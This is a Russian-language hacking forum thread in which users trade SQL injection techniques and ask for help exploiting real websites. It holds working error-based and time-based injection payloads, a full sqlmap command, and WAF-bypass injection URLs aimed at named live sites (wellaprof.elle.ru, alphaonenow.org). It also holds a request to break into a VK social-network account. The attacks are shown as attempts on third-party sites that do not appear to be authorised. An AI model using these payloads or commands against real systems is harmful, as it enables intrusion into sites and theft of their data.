Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    PHP:
    id=1+AND+EXTRACTVALUE(22,CONCAT(0x5c,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1)))--+1
    XPATH-Error-Based-Injection-Extractvalue
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    самый очевидный
    +and+if(substring(@@version,1,1)=5,sleep(2224),null)
    С выводом нету вектора, возможно в дальнейшем будет.
     
    Vip77 likes this.
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    в чём проблема то?
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я не пробовал, но я не вижу препятствий. Обычная временная инъекция.
     
  5. 17919

    17919 New Member

    Joined:
    26 Jan 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    как аккаунт вк открыть?
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
     
    BabaDook, Jerri and Veil like this.
  7. 17919

    17919 New Member

    Joined:
    26 Jan 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    с чего такой детский вывод?
     
  8. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
  9. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    хз, на счёт sqli, и не помню чтоб такое дисклоузили, а вот xxe там пофиксили 2 месяца назад...
    опять же это то, что из открытого
     
  10. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    похоже на WAF
    попробуй --current-user
    бывает такое что базу не достает, но пользователя бд читает.
    еще вариант искать другу скулю на сайте, возможно где будет UNION или error based.
     
  11. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    нмап не может раскрутить скулу
    sqlmap -u http://wellaprof.elle.ru/competition?order_by=date&offset=9 --dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
    Остальные скрипты тоже.
    Ручками так выходит ошибка:
    Incorrect usage of UNION and ORDER BY

    Проблема в фильтрации или на самом деле скули там нет?
     
  12. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Скуля там есть это 100%
    по ошибке всё ясно там может waf стоит ща сам гляну
     
  13. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    http://wellaprof.elle.ru/competitio...R(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
     
    Muracha likes this.
  14. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
  15. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
  16. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  17. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    ссылается на неверный запрос:
    Вроде не waf, а я как-то неправильно составил запрос.
    Допускается кстати и так но ошибка идиентичная
    Code:
    http://wellaprof.elle.ru/competition?order_by=date&offset=1%20procedure%20analyse(extractvalue(rand()%2cconcat(0x3a%2cCONCAT(TABLE_NAME)))%2c1)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--%201
    Нашел интересную книгу
    https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf

    Попытался сделать по ней но тот же результат:
    http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(TABLE_NAME))),1)+ascii(lower(mid((from+information_schema.tables),1,1)))-- 1

    По ней составил запрос для обхода WAF
    Выводит значение XPATH syntax error: ':108'

    А такое же значение как и (0x3a%2cCONCAT(TABLE_NAME)
    Но понять не могу что фильтрует и как это обойти, чтобы вывести данные.

     
    #2297 Muracha, 17 Apr 2018
    Last edited: 17 Apr 2018
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Помогите пожалуйста, никак не могу сделать это
    Code:
    http://www.alphaonenow.org/story.php?news_id=2 UnIoN  select 1,2,3+--+-
    
    Никак не могу получить вывод.
     
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    как прописать чтобы вызвать tables ?
    [​IMG]
    DB_A2FF5A_icodatabase
     
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Саня, загугли mssql injection